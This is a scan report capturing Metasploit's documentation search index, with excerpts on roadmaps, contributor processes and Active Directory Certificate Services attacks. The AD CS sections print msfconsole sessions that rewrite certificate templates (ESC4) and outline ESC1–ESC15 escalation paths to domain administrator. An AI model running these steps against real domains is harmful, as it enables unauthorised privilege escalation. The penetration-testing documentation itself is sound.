https://docs.metasploit.com/assets/js/search-data.json

Submitted URL:
https://docs.metasploit.com/assets/js/search-data.json
Report completed:

Links · 0 results

External links identified on the page

JavaScript variables · 3 results

Global JavaScript variables loaded onto the page's window object are variables declared outside any function; they can be accessed from any part of the code within the current scope.

Name                      Type
onbeforetoggle            object
documentPictureInPicture  object
onscrollend               object

Console log messages · 1 result

Messages logged to the web console

Type   Category  Log
error  network   URL: https://docs.metasploit.com/favicon.ico
                 Text: Failed to load resource: the server responded with a status of 404 ()

HTML

Raw HTML body of the page

<html><head><meta name="color-scheme" content="light dark"></head><body><pre style="word-wrap: break-word; white-space: pre-wrap;">{"0": {
    "doc": "2017 Roadmap Review",
    "title": "Metasploit’s 2017 Roadmap Review",
    "content": "In 2017, we published our first open roadmap for Metasploit development. How did we do? For achievements: . | The Metasploit data model backend: we did a lot of design work on this, and got a couple of initial Proof-of-Concept project built. You can see a video of it here: https://www.youtube.com/watch?v=hvuy6A-ie1g. In the mean time, we started merging parts of the main development branch . | The first pass of external session handling landed with the metasploit-proxy project. | Independent modules that run in isolation did land, along with a hand full of new modules demonstrating the advantages of the design, including multi-language support. | The ruby_smb project made a lot of progress, with support incorporated into several existing modules. Full client-side support is also available for testing now. | Native iOS and macOS support landed, along with many new IoT and router exploits. | Meterpreter shrank almost 4x thanks to the new cryptTLV packet obfuscation support, and the removal of OpenSSL. | . Things we didn’t quite finish: . | Metasploit’s RESTful interface was not complete in 2017, so we will continue it into 2018. | Session handling as a separate process was implemented with the https://github.com/rapid7/metasploit-aggregator project, but more work needs to be done to improve scalability and usability. | Asynchronous session support remains on the drawing board. | SOCKS5 support did not land, but Metasploit did gain a lot more support for running modules externally as separate processes, and gained initial support for running modules in Python. | Modernized payload generation with new tools continues to be researched. | . ",
    "url": "/docs/development/roadmap/2017-roadmap-review.html#metasploits-2017-roadmap-review",
    "relUrl": "/docs/development/roadmap/2017-roadmap-review.html#metasploits-2017-roadmap-review"
  },"1": {
    "doc": "2017 Roadmap Review",
    "title": "2017 Roadmap Review",
    "content": " ",
    "url": "/docs/development/roadmap/2017-roadmap-review.html",
    "relUrl": "/docs/development/roadmap/2017-roadmap-review.html"
  },"2": {
    "doc": "2017 Roadmap",
    "title": "Metasploit’s 2017 Roadmap",
    "content": "Starting in 2017, we will provide an open roadmap for setting our goals for the year. The goals are based on many discussions we have had over the past year with users, developers, and customers. The intent is to provide focus for core developers and contributors alike, so that we can together work toward a common vision for how we want Metasploit to evolve. This year, the themes for Metasploit are modularity, reusability, and reliability. Metasploit has grown organically over the years into a very large project, combining thousands of modules, payloads, a database, session handling, user interaction and more into a single monolithic application. While the design has served us well, it has reached some limits for maintainability and agility. While we continue to refactor, improve, and reorganize Metasploit, large-scale improvements become increasingly difficult and highlight fragility in the overall system, due to its highly interdependent design. We want to allow users to effortlessly contribute to the portions of Metasploit they are interested in, and be able to reuse code, both from inside and and outside of the project. Language and licensing constraints have presented barriers to users, both real and imagined. Python, Go, C# and other languages are dominating influences on the infosec community. We would like to be able to welcome more developers, researchers, and tooling into the Metasploit ecosystem, taking advantage of the best-in-breed and avoiding not-invented-here syndrome wherever possible. In short, we want to develop reusable, modular, and reliable services to enable researchers, pen-testers, students, and red-teamers to work efficiently, have access to the latest technologies and techniques, and to continue to grow the Metasploit community. ",
    "url": "/docs/development/roadmap/2017-roadmap.html#metasploits-2017-roadmap",
    "relUrl": "/docs/development/roadmap/2017-roadmap.html#metasploits-2017-roadmap"
  },"3": {
    "doc": "2017 Roadmap",
    "title": "The roadmap",
    "content": ". | The Metasploit data model backend should be separated into its own project. Plans include a data service that provides a RESTful interface, both an event-oriented and classic workspace-oriented view of incoming data, improved performance, and easy direct interoperability with other tools. | Session handling should be able to operate independently of framework, allowing users to share sessions and allowing servers to be as performant, reliable, and light-weight as possible. We have already begun a project called ‘metasploit-aggregator’ which is a first generation of this design. Once this is complete, direct integration into other frameworks should also be possible. | Metasploit should support asynchronous sessions. Many testers today use asynchronous frameworks like Empire to maintain light-weight persistence or a footholds into a network, then have to pivot to Meterpreter for interactive sessions. We would like to be able seamlessly support both modes of operation, including the ability to run post exploitation modules and modules over pivots asynchronously as well. | Metasploit should support running exploit and auxiliary modules in an isolated mode. Plans are underway to support supporting an RPC-style module API to Metasploit framework, providing core services like payload and session handling, network routing, reporting and logging. Modules are run as child processes to Metasploit, and are only loaded into memory as-needed. Networking from a module point-of-view will be handled via SOCKS5 proxy support, hooking the child environment, or remote API calls, largely removing the need for specially-crafted socket objects or changes to 3rd-party protocol libraries. Modules, when written for the Metasploit API, could even be tested and used independently from the full Metasploit framework. | . In addition to these primary goals, we’d also like to explore: . 
| SMB 2.0 SMB 1.0 increasingly being disabled in many networks, making Metasploit modules using this protocol ineffective. We would like to implement at least server-side support for SMB 2.0, both for sharing files and for named pipe communications. | iOS and macOS support The mettle and python meterpreter payloads will continue evolving to further support OS X and iOS, along with more post exploitation support. | Native Android support in Mettle We began the work last year with mettle now supporting all of the basic operations for a Meterpreter implementation. We would like to continue adding Android post-exploitation capabilities to mettle as well. | Streamlining Windows Meterpreter mettle soon will replace the original POSIX meterpreter, which will reduce the size of the Windows meterpreter. Switching from OpenSSL to native SChannel support will simplify and shrink Windows meterpreter, allowing to focus on what it supports best. | Router and IoT research We would like to continue research and support for embedded device exploitation and first-class support for resource-constrained environments. | Modernizing payload generation We are investigating being able to integrate with third-party toolchains for building assembly, C, .NET, Java, on the fly, making it easy for a user to acquire the and use the tools, while providing first-class support for many architectures and platforms. | . ",
    "url": "/docs/development/roadmap/2017-roadmap.html#the-roadmap",
    "relUrl": "/docs/development/roadmap/2017-roadmap.html#the-roadmap"
  },"4": {
    "doc": "2017 Roadmap",
    "title": "2017 Roadmap",
    "content": " ",
    "url": "/docs/development/roadmap/2017-roadmap.html",
    "relUrl": "/docs/development/roadmap/2017-roadmap.html"
  },"5": {
    "doc": "Manage certificate templates",
    "title": "AD CS Certificate Template Exploitation",
    "content": "This module can read, write, update, and delete AD CS certificate templates from a Active Directory Domain Controller. The READ, UPDATE, and DELETE actions will write a copy of the certificate template to disk that can be restored using the CREATE or UPDATE actions. The CREATE and UPDATE actions require a certificate template data file to be specified to define the attributes. Template data files are provided to create a template that is vulnerable to ESC1, ESC2, and ESC3. This module is capable of exploiting ESC4. In order for the auxiliary/admin/ldap/ad_cs_cert_template module to succeed, the authenticated user must have the necessary permissions to perform the specified action on the target object (the certificate specified in CERT_TEMPLATE). ",
    "url": "/docs/pentesting/active-directory/ad-certificates/ad_cs_cert_template.html#ad-cs-certificate-template-exploitation",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/ad_cs_cert_template.html#ad-cs-certificate-template-exploitation"
  },"6": {
    "doc": "Manage certificate templates",
    "title": "Lab setup",
    "content": "Follow the steps in the Installing AD CS documentation. ",
    "url": "/docs/pentesting/active-directory/ad-certificates/ad_cs_cert_template.html#lab-setup",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/ad_cs_cert_template.html#lab-setup"
  },"7": {
    "doc": "Manage certificate templates",
    "title": "Module usage",
    "content": "The admin/ldap/ad_cs_cert_template module is generally used to update a certificate template as part of an ESC4 attack. | From msfconsole | Do: use auxiliary/admin/ldap/ad_cs_cert_template | Set the RHOSTS, USERNAME and PASSWORD options | Set the CERT_TEMPLATE option to the name of the target certificate template | Set the ACTION b. For the UPDATE action, set the TEMPLATE_FILE option c. For the CREATE action, optionally set the TEMPLATE_FILE option | Run the module and see the operation complete successfully | . ",
    "url": "/docs/pentesting/active-directory/ad-certificates/ad_cs_cert_template.html#module-usage",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/ad_cs_cert_template.html#module-usage"
  },"8": {
    "doc": "Manage certificate templates",
    "title": "Actions",
    "content": "CREATE . Create the certificate template in the LDAP server. If no TEMPLATE_FILE is specified, a new certificate template will be created based on the Microsoft-builtin SubCA template with a default security descriptor. If the TEMPLATE_FILE is specified, the attributes it defines are merged with the SubCA template. This allows attributes such as the security descriptor and name to be defined. READ . Read the certificate template from the LDAP server. A copy will be saved to disk. UPDATE . Update the certificate template in the LDAP server. The TEMPLATE_FILE must be specified and will be used to read attributes to set on the certificate template object. The TEMPLATE_FILE option can be set to a previously stored template file to restore the object to a previous state. DELETE . Delete the certificate template in the LDAP server. This is a destructive action. ",
    "url": "/docs/pentesting/active-directory/ad-certificates/ad_cs_cert_template.html#actions",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/ad_cs_cert_template.html#actions"
  },"9": {
    "doc": "Manage certificate templates",
    "title": "Options",
    "content": "CERT_TEMPLATE . The remote certificate template name. This is used as the common name (CN) for the LDAP object. TEMPLATE_FILE . This is a local template file from which to read object attributes from. Two file formats are supported, JSON and YAML. The file format is determined by the extension so the file must end in either .json or .yaml. The JSON format . The JSON file format is a hash with attribute name keys and ASCII-hex encoded values. These files are compatible with Certipy’s template command. This module uses the JSON file format when storing copies of certificate to disk. The YAML format . The YAML file format is similar to the JSON file format, but takes advantage of YAML’s ability to include comments. The file consists of a hash with attribute name keys and value strings. The nTSecurityDescriptor file can be either a binary string representing a literal value, or a security descriptor defined in Microsoft’s Security Descriptor Definition Language (SDDL). Premade configuration templates provided by Metasploit use this format. ",
    "url": "/docs/pentesting/active-directory/ad-certificates/ad_cs_cert_template.html#options",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/ad_cs_cert_template.html#options"
  },"10": {
    "doc": "Manage certificate templates",
    "title": "Scenarios",
    "content": "For steps on exploiting ESC4, see Exploiting ESC4. Creating A Certificate Template . In this scenario, the operator uses the module to create a new certificate template. Either the default local template can be used to make one vulnerable to ESC1, or a previously saved configuration can be used. In the following example, the TEMPLATE_FILE option is used to restore the settings from a previously deleted template. msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; use auxiliary/admin/ldap/ad_cs_cert_template msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set RHOSTS 192.168.159.10 RHOSTS =&amp;gt; 192.168.159.10 msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set USERNAME aliddle USERNAME =&amp;gt; aliddle msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set PASSWORD Password1! PASSWORD =&amp;gt; Password1! msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set CERT_TEMPLATE ESC4-Test CERT_TEMPLATE =&amp;gt; ESC4-Test msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set ACTION CREATE ACTION =&amp;gt; CREATE msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set TEMPLATE_FILE /home/smcintyre/.msf4/loot/20230505102851_default_192.168.159.10_windows.ad.cs.te_242316.json TEMPLATE_FILE =&amp;gt; /home/smcintyre/.msf4/loot/20230505102851_default_192.168.159.10_windows.ad.cs.te_242316.json msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; run [*] Running module against 192.168.159.10 [+] Successfully bound to the LDAP server! [*] Discovering base DN automatically [*] 192.168.159.10:389 Getting root DSE [+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local [*] Creating: CN=ESC4-Test,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local [+] The operation completed successfully! [*] Auxiliary module execution completed msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; . Deleting A Certificate Template . 
In this scenario, the operator uses the module to delete the ESC4-Test certificate template. A backup of the original certificate’s data is made before it is deleted. This file can be used with the CREATE action to restore the certificate template. msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; use auxiliary/admin/ldap/ad_cs_cert_template msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set RHOSTS 192.168.159.10 RHOSTS =&amp;gt; 192.168.159.10 msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set USERNAME aliddle USERNAME =&amp;gt; aliddle msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set PASSWORD Password1! PASSWORD =&amp;gt; Password1! msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set CERT_TEMPLATE ESC4-Test CERT_TEMPLATE =&amp;gt; ESC4-Test msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set ACTION DELETE ACTION =&amp;gt; DELETE msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; run [*] Running module against 192.168.159.10 [+] Successfully bound to the LDAP server! [*] Discovering base DN automatically [*] 192.168.159.10:389 Getting root DSE [+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local [+] Read certificate template data for: CN=ESC4-Test,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local [*] Certificate template data written to: /home/smcintyre/.msf4/loot/20230505102851_default_192.168.159.10_windows.ad.cs.te_242316.json [+] The operation completed successfully! [*] Auxiliary module execution completed msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; . Reading A Certificate Template . In this scenario, the operator uses the module to read the configuration of the default User certificate template. 
msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; use auxiliary/admin/ldap/ad_cs_cert_template msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set RHOSTS 192.168.159.10 RHOSTS =&amp;gt; 192.168.159.10 msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set USERNAME aliddle USERNAME =&amp;gt; aliddle msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set PASSWORD Password1! PASSWORD =&amp;gt; Password1! msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set CERT_TEMPLATE User CERT_TEMPLATE =&amp;gt; User msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set ACTION READ ACTION =&amp;gt; READ msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; run [*] Running module against 192.168.159.10 [+] Successfully bound to the LDAP server! [*] Discovering base DN automatically [*] 192.168.159.10:389 Getting root DSE [+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local [+] Read certificate template data for: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local [*] Certificate template data written to: /home/smcintyre/.msf4/loot/20230505125728_default_192.168.159.10_windows.ad.cs.te_691087.json [*] Certificate Template: [*] distinguishedName: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local [*] displayName: User [*] objectGUID: ceed9142-d00f-459e-9694-02eb59ea1ec8 [*] msPKI-Certificate-Name-Flag: 0xa6000000 [*] * CT_FLAG_SUBJECT_ALT_REQUIRE_UPN [*] * CT_FLAG_SUBJECT_ALT_REQUIRE_EMAIL [*] * CT_FLAG_SUBJECT_REQUIRE_EMAIL [*] * CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH [*] msPKI-Enrollment-Flag: 0x00000029 [*] * CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS [*] * CT_FLAG_PUBLISH_TO_DS [*] * CT_FLAG_AUTO_ENROLLMENT [*] msPKI-RA-Signature: 0x00000000 [*] pKIExtendedUsage: [*] * 1.3.6.1.4.1.311.10.3.4 [*] * 1.3.6.1.5.5.7.3.4 [*] * 1.3.6.1.5.5.7.3.2 [+] The operation completed successfully! 
[*] Auxiliary module execution completed msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; . Updating A Certificate Template . In this scenario, the operator uses the module to update and reconfigure the ESC4-Test certificate template to make it vulnerable to ESC1 (the default template settings). This process first makes a backup of the certificate data that can be used later. The local certificate template data can be modified to set a custom security descriptor. msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; use auxiliary/admin/ldap/ad_cs_cert_template msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set RHOSTS 192.168.159.10 RHOSTS =&amp;gt; 192.168.159.10 msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set USERNAME aliddle USERNAME =&amp;gt; aliddle msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set PASSWORD Password1! PASSWORD =&amp;gt; Password1! msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set CERT_TEMPLATE ESC4-Test CERT_TEMPLATE =&amp;gt; ESC4-Test msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set ACTION UPDATE ACTION =&amp;gt; UPDATE msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set VERBOSE true VERBOSE =&amp;gt; true msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; run [*] Running module against 192.168.159.10 [+] Successfully bound to the LDAP server! [*] Discovering base DN automatically [*] 192.168.159.10:389 Getting root DSE [+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local [+] Read certificate template data for: CN=ESC4-Test,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local [*] Certificate template data written to: /home/smcintyre/.msf4/loot/20230505083802_default_192.168.159.10_windows.ad.cs.te_593597.json [*] Parsing SDDL text: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU) [+] The operation completed successfully! [*] Auxiliary module execution completed msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; . ",
    "url": "/docs/pentesting/active-directory/ad-certificates/ad_cs_cert_template.html#scenarios",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/ad_cs_cert_template.html#scenarios"
  },"11": {
    "doc": "Manage certificate templates",
    "title": "Manage certificate templates",
    "content": " ",
    "url": "/docs/pentesting/active-directory/ad-certificates/ad_cs_cert_template.html",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/ad_cs_cert_template.html"
  },"12": {
    "doc": "Release Notes",
    "title": "Writing Release Notes",
    "content": "Okay, so now that you know how to add a release note, you’re wondering what you’re supposed to write. Basically, a release note summarizes the pull request and describes the value of the fix/feature to the user. Each release note has a title, a PR number, and a brief description. Here’s an example of what a release note looks likes: . The Beholder plugin automatically captures keystrokes, screenshots, and webcam snapshots from your active sessions. Run this plugin to collect data from your compromised targets every 30 seconds. ",
    "url": "/docs/development/maintainers/process/adding-release-notes-to-prs.html#writing-release-notes",
    "relUrl": "/docs/development/maintainers/process/adding-release-notes-to-prs.html#writing-release-notes"
  },"13": {
    "doc": "Release Notes",
    "title": "Types of Release Notes",
    "content": "There are three types of release notes: . | Enhancement | Fix | Modules | . Release Notes for Enhancements . An enhancement indicates that an improvement or new feature has been added to the framework. Enhancements include things like auxiliary modules, post-exploitation modules, and new payloads. When you write release notes for an enhancement, you should try to answer the following questions: . | What is the enhancement? | Why is it valuable or important to users? | How can they use it? | . For example, the following is a release note for an enhancement: . The new ‘resolve’ command enables you to perform DNS lookups with Meterpreter, without leaving the session to run additional modules. To resolve host names on the target, you can run the ‘resolve’ command followed by the host name. For example, in the Meterpreter prompt, you can type something like ‘resolve rapid7.com’ to view the host resolutions for Rapid7. Release Notes for Fixes . A fix is for an issue that caused a particular feature or functionality to not work the way it’s expected to work. Basically, a defect indicates that something was broken, and we’ve fixed it. When you write release notes for a fix, you should try to answer the following questions: . | What was broken? | How was it fixed? | Why is this important to users? | . Here’s an example for a fix: . The email header contained duplicate date and subject headers, which caused email servers like AWS SES, to reject the emails. This fix removes the duplicate headers so that campaigns can send emails successfully. Release Notes for Modules . An exploit is a module that takes advantage of a vulnerability and provides some type of access to the target. We call out exploits explicitly because they’re the hotness. When you write release notes for an exploit, you should try to answer the following questions: . | What vulnerability is the module exploiting? | What type of access can you achieve with the module? 
| Do you need credentials to exploit the vulnerability? | . And finally, here’s an example for exploits: . This module allows you to exploit HP Data Protector, a backup and recovery system, to remotely upload files to the file share. Versions 6.10, 6.10, and 6.20 are vulnerable. You don’t need to authenticate to exploit this vulnerability. ",
    "url": "/docs/development/maintainers/process/adding-release-notes-to-prs.html#types-of-release-notes",
    "relUrl": "/docs/development/maintainers/process/adding-release-notes-to-prs.html#types-of-release-notes"
  },"14": {
    "doc": "Release Notes",
    "title": "Release Notes",
    "content": "Release notes inform our users about the stuff we’re shipping in each release. By looking at our release notes, our users should be able to easily understand what’s new, what’s fixed, and what’s changed in the release. Therefore, all PRs, except for minor fixes and tweaks, must have release notes. To add a release note to a pull request, you’ll need to add it as a comment, like so: . You’ll need to tag the comment for inclusion in the release notes by using the # Release Notes heading. After you apply the release notes heading, you can enter the release notes text you want to use. That’s it! After you add the release notes text, we’ll be able to extract them from the pull requests when we run our release notes script and compile them into a single document. ",
    "url": "/docs/development/maintainers/process/adding-release-notes-to-prs.html",
    "relUrl": "/docs/development/maintainers/process/adding-release-notes-to-prs.html"
  },"15": {
    "doc": "API",
    "title": "API",
    "content": "View the latest API docs at: . https://docs.metasploit.com/api/ . ",
    "url": "/docs/development/developing-modules/libraries/api.html",
    "relUrl": "/docs/development/developing-modules/libraries/api.html"
  },"16": {
    "doc": "Assigning Labels",
    "title": "Assigning Labels",
    "content": "Maintainers can assign labels to both issues and pull requests. Attic . When we move something to the attic it means that what you submitted is a thing that we want but the circumstances were not quite right for landing it. Sometimes this is on us, and sometimes the contribution needs more work. We recognize that contributors work on the PRs they submit at their own pace. Take a look at the comments and review suggestions on your PR, and feel free to re-open it if and when you have time to work on it again. Don’t think you’ll be able to get it across the finish line? Find a community champion to do it for you. Bug . Any PR that fixes a bug or an issue that raises awareness of a bug in the framework. Breaking Change . Features that are great, but will cause breaking changes and should be deployed on a large release. Code Quality . When a PR improves code quality. Confirmed . Specifically for issues that have been confirmed by a committer. Docs . Documentation changes, such as YARD markup, or README.md, or something along those lines. External Modules . PRs dealing with modules run as their own process. Heartbleed . Has to do with heartbleed. This will go away soon, but there are three outstanding still… . Hotness . Something we’re really excited about. Library . Touches something in /lib. Meterpreter . Has to do with Meterpreter, or depends on a Meterpreter change to land to work. Misc . Plugins and scripts, anything that’s not otherwise defined. Module . Touches something in /modules. Needs Linting . The module needs additional work to pass our automated linting rules. Needs More Information . The issue lacks enough detail to replicate/resolve successfully. Newbie Friendly . Something that’s pretty easy to test or tackle. Needs unique branch . Your submitted a PR from your master branch. Because of how GitHub tracks changes between branches and what got added in a particular PR, we don’t accept contributions from the master branch of your fork. 
All branches are required to be unique. If your PR is closed because of this, create a new branch with that code and we’ll be happy to look at it again! . git checkout -b &amp;lt;BRANCH_NAME&amp;gt; git push &amp;lt;your_fork_remote&amp;gt; &amp;lt;BRANCH_NAME&amp;gt; . This helps protect the process, ensure users are aware of commits on the branch being considered for merge, allows for a location for more commits to be offered without mingling with other contributor changes and allows contributors to make progress while a PR is still being reviewed. Needs-docs . When a module is uploaded without a corresponding documentation file, add this label in indicate docs are required . Not Stale . Label to stop an issue from being auto closed. Osx . Label for any osx related work. Payload . Touches something related to a payload. RN (Release notes) . There are a series of labels that are added to all PRs when they are landed that define the release notes for the PR. They are denoted by the rn- prefix and they are important as they are used by automation to track metasploit-framework statistics: . rn-enhancement . Release notes for an enhancement. rn-fix . Release notes for a fix. rn-modules . Release notes for new or majorly enhanced modules. rn-no-release-notes . The PR is too small or insignificant to warrant release notes. rn-wiki . Release notes for Metasploit Framework wiki. Stale . Marks an issue as stale, to be closed if no action is taken. Suggestion . Suggestions for new functionality. Suggestion-docs . New documentation suggestions. Suggestion-feature . New feature suggestions. Suggestion-Module . New module suggestions. Usability . Usability improvements. YARD . YARD Documentation Tasks for API Documentation. ",
    "url": "/docs/development/maintainers/process/assigning-labels.html",
    "relUrl": "/docs/development/maintainers/process/assigning-labels.html"
  },"17": {
    "doc": "Attacking AD CS ESC Vulnerabilities Using Metasploit",
    "title": "Setting Up An AD CS Target",
    "content": "Follow the instructions here to set up an AD CS server for testing purposes. ",
    "url": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#setting-up-an-ad-cs-target",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#setting-up-an-ad-cs-target"
  },"18": {
    "doc": "Attacking AD CS ESC Vulnerabilities Using Metasploit",
    "title": "Introduction to AD CS Vulnerabilities",
    "content": "flowchart TD subgraph ad_cs_cert_templates[&amp;lt;b&amp;gt;ad_cs_cert_templates&amp;lt;/b&amp;gt;] ESC4(ESC4) update_template[&amp;lt;i&amp;gt;Update Template&amp;lt;/i&amp;gt;] ESC4 -- abuse privileges --&amp;gt; update_template end subgraph icpr_cert[&amp;lt;b&amp;gt;icpr_cert&amp;lt;/b&amp;gt;] ESC1(ESC1) ESC2(ESC2) ESC3(ESC3) ESC13(ESC13) ESC15(ESC15) alt_subject[&amp;lt;i&amp;gt;Alternate Subject Issuance&amp;lt;/i&amp;gt;] add_policies[&amp;lt;i&amp;gt;Alternate Subject Issuance&amp;lt;/i&amp;gt;&amp;lt;br&amp;gt;and&amp;lt;br&amp;gt;&amp;lt;i&amp;gt;Add Policy OIDs&amp;lt;/i&amp;gt;] as_eagent[&amp;lt;i&amp;gt;Enrollment Agent Issuance&amp;lt;/i&amp;gt;] normal[&amp;lt;i&amp;gt;Normal Issuance&amp;lt;/i&amp;gt;] ESC1 --&amp;gt; alt_subject ESC2 --&amp;gt; as_eagent ESC3 --&amp;gt; as_eagent ESC13 --&amp;gt; normal ESC15 --&amp;gt; add_policies as_eagent -- use new certificate --&amp;gt; normal end subgraph kerberos/get_ticket[&amp;lt;b&amp;gt;kerberos/get_ticket&amp;lt;/b&amp;gt;] PKINIT[&amp;lt;i&amp;gt;PKINIT&amp;lt;/i&amp;gt;] end subgraph ldap/ldap_login[&amp;lt;b&amp;gt;ldap/ldap_login&amp;lt;/b&amp;gt;] SCHANNEL[&amp;lt;i&amp;gt;SCHANNEL&amp;lt;/i&amp;gt;] end subgraph ldap_esc_vulnerable_cert_finder[&amp;lt;b&amp;gt;ldap_ecs_vulnerable_cert_finder&amp;lt;/b&amp;gt;] find_vulnerable_templates[&amp;lt;i&amp;gt;Find Vulnerable Templates&amp;lt;/i&amp;gt;] end add_policies -- add client authentication oid --&amp;gt; SCHANNEL add_policies -- add certificate request agent oid --&amp;gt; as_eagent alt_subject --&amp;gt; PKINIT alt_subject --&amp;gt; SCHANNEL find_vulnerable_templates --&amp;gt; icpr_cert normal --&amp;gt; PKINIT normal --&amp;gt; SCHANNEL update_template --&amp;gt; ESC1 . The chart above showcases how one can go about attacking five unique AD CS vulnerabilities, taking advantage of various flaws in how certificate templates are configured on an Active Directory Certificate Server. 
The following sections will walk through each of these steps, starting with enumerating the certificate templates that the server has to offer and identifying those that are vulnerable to various misconfigurations and security flaws, followed by creating new certificates using these certificate templates with the icpr_cert Metasploit module, and finally using these certificates to authenticate to the domain as the domain administrator via Kerberos. Each certificate template vulnerability that will be discussed here has an ESC code, such as ESC1 or ESC2. These ESC codes are taken from the original whitepaper published by SpecterOps, known as Certified Pre-Owned, which popularized these certificate template attacks. In this paper Will Schroeder and Lee Christensen described 8 different domain escalation attacks that they found they could conduct via misconfigured certificate templates: . | ESC1 - Domain escalation via No Issuance Requirements + Enrollable Client Authentication/Smart Card Logon OID templates + CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT . | Exploit Steps | . | ESC2 - Domain escalation via No Issuance Requirements + Enrollable Any Purpose EKU or no EKU . | Exploit Steps | . | ESC3 - Domain escalation via No Issuance Requirements + Certificate Request Agent EKU + no enrollment agent restrictions . | Exploit Steps | . | ESC4 - Domain escalation via misconfigured certificate template access control . | Exploit Steps | . | ESC5 - Domain escalation via vulnerable PKI AD Object Access Control | ESC6 - Domain escalation via the EDITF_ATTRIBUTESUBJECTALTNAME2 setting on CAs + No Manager Approval + Enrollable Client Authentication/Smart Card Logon OID templates | ESC7 - Vulnerable Certificate Authority Access Control | ESC8 - NTLM Relay to AD CS HTTP Endpoints | . Later, additional techniques were disclosed by security researchers: . | ESC9 - No Security Extension - CT_FLAG_NO_SECURITY_EXTENSION flag set in msPKI-EnrollmentFlag. 
Also StrongCertificateBindingEnforcement not set to 2 or CertificateMappingMethods contains UPN flag. | Certipy 4.0: ESC9 & ESC10, BloodHound GUI, New Authentication and Request Methods — and more! | . | ESC10 - Weak Certificate Mappings - HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\SecurityProviders\\Schannel CertificateMappingMethods contains UPN bit aka 0x4 or HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Kdc StrongCertificateBindingEnforcement is set to 0. | Certipy 4.0: ESC9 & ESC10, BloodHound GUI, New Authentication and Request Methods — and more! | . | ESC11 - Relaying NTLM to ICPR - Relaying NTLM authentication to the unprotected RPC interface is allowed due to the lack of the IF_ENFORCEENCRYPTICERTREQUEST flag on Config.CA.Interface.Flags. | Relaying to AD Certificate Services over RPC | . | ESC12 - A user with shell access to a CA server using a YubiHSM2 hardware security module can access the CA’s private key. | Shell access to ADCS CA with YubiHSM | . | ESC13 - Domain escalation via issuance policies with group links. | ADCS ESC13 Abuse Technique | Exploit Steps | . | ESC14 - Explicit certificate mappings through altSecurityIdentities write access abuse . | ADCS ESC14 Abuse Technique | . | ESC15 (AKA EKUwu) - Domain escalation via No Issuance Requirements + CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT + Policy OID manipulation . | EKUwu: Not just another AD CS ESC | Exploit Steps | . | . Currently, Metasploit only supports attacking ESC1, ESC2, ESC3, ESC4, ESC13 and ESC15. As such, this page only covers exploiting ESC1 through ESC4, ESC13 and ESC15 at this time. Before continuing, it should be noted that ESC1 is slightly different from ESC2 and ESC3, as the diagram above shows. This is because in ESC1, one has control over the subjectAltName field in the generated certificate, which is also known as the SAN field. This field allows one to specify who the certificate should authenticate as. 
